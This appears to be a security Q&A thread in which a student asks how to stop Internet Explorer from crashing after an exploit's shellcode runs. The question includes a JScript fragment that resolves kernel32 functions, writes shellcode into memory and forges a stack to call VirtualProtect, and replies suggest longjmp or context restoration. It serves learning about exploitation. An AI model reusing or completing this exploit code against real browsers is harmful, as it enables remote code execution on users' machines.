# How to avoid crash after successfully run shellcode?

Tags: javascript, exploit, shellcode, internet-explorer

I am a student studying information security. Recently I read this article [link](https://blog.confiant.com/internet-explorer-cve-2019-1367-exploitation-part-2-8143242b5780) and made full exploit code. calc.exe is executed as expected. But after running shellcode, IE just crashed. (because no more code provided after shellcode...). I tried to avoid crash but could not find proper solution. What I tried is as follows.

```
            ... var jscriptPointer = readDWORD(fakeRegExpAddr);
                var jscriptBase = resolveModuleBase(jscriptPointer);
                var kernel32Pointer = resolveModuleByIAT(jscriptBase, "KERNEL32.dll");
                var kernel32Base = resolveModuleBase(kernel32Pointer);
                var VirtualProtect = resolveKernel32Function(kernel32Base, "VirtualProtect");
                var GetModuleHandleA = resolveKernel32Function(kernel32Base, "GetModuleHandleA");
                var GetProcAddress = resolveKernel32Function(kernel32Base, "GetProcAddress");
                var stack = a(fakeRegExpAddr, readDWORD(fakeRegExpAddr));
                var regExpExecAddress = ((stack.charCodeAt(4)<<16)|stack.charCodeAt(3)) - 0x44;
                var oldEbp = ((stack.charCodeAt(7)&0xFF)<<24) | (stack.charCodeAt(6)<<8) | ((stack.charCodeAt(5)>>8)&0xFF);
                var newEbp = regExpExecAddress - 0x2000;
                var pLongjmpTarget = regExpExecAddress;
                var sc = fakeRegExpAddr + sizeof_RegExpObj;
                for(var f=0; f<shellcode.length; f++){
                    a(sc + (f * sizeof_WORD), shellcode.charCodeAt(f));
                }
                    var ctx = sc + 5;
                    a(ctx + (2 * e), oldEbp);         // these two lines are for passing data
                    a(ctx + (3 * e), pLongjmpTarget); // to shellcode.
                
                for(var f=newEbp-0x20; f<newEbp+0x40; f+=U)
                {
                    a(f,0x7FFE0000);
                }
                
                a(newEbp + 4, VirtualProtect);
                a(newEbp + 4 + 4 + 0x18, sc);
                a(newEbp + 4 + 4 + 4 + 0x18, sc);
                a(newEbp + 4 + 4 + 4 + 4 + 0x18, (shellcode.length * sizeof_WCHAR));
                a(newEbp + 4 + 4 + 4 + 4 + 4 + 0x18, 0x40);
                a(newEbp + 4 + 4 + 4 + 4 + 4 + 4 + 0x18, newEbp);
                a(regExpExecAddress, newEbp);
            }
```

This code is referenced from this [link](https://ti.dbappsecurity.com.cn/blog/index.php/2020/09/18/cve-2020-0968/). Then I don't know what to do in shellcode.
how can I handle this problem? Any suggestions are welcomed. Thanks in advance.

Comment: It's not really a problem. You did your thing and executed your code. Even in a real-world scenario, who is surprized at IE crashing?

Comment: As I have mentioned, I am a student and I want to learn something. So could you provide some methods to avoid crash?

Comment: Depending on the explout, it may be unavoidable.

Comment: I first get context of ie process using rtlcapturecontext windows api, then after running calc.exe, I just restored context using ntcontinue function. Eip moved as expected. But after running a few instructions, just crashed agian. what else can i do?

Comment: after running shellcode, no more javascript code needs to be executed. So I want to exit javascript code. Is it possible?

Comment: Just give it time, binary exploitation isn't the most popular topic here. If you haven't gotten an answer by tomorrow, I'll add a bounty

Comment: @MechMK: Thank you. I am waiting for your answer. Any suggestions are welcomed.

Comment: Unfortunately, I don't have one. I'm not an expert in binary exploitation, but after I think 48 hours passed, I'll add a bounty, which encourages others to answer.

Comment: Here is your bounty. Hope you get a nice answer now

Comment: See longjmp usage here: https://stackoverflow.com/questions/14685406/practical-usage-of-setjmp-and-longjmp-in-c

Comment: Chances are you are not correctly restoring the execution of the program to the expected execution. Process continuation itself is an art in exploitation.

Answer (score -1):

This can be solved by longjmp. longjmp is similar to goto, so this can rollback to original state of your code.

Comment: thank you for your reply. But could you specify more details?

Comment: This doesn't really answer the question at all. Could you perhaps give a clearer explanation or add some code?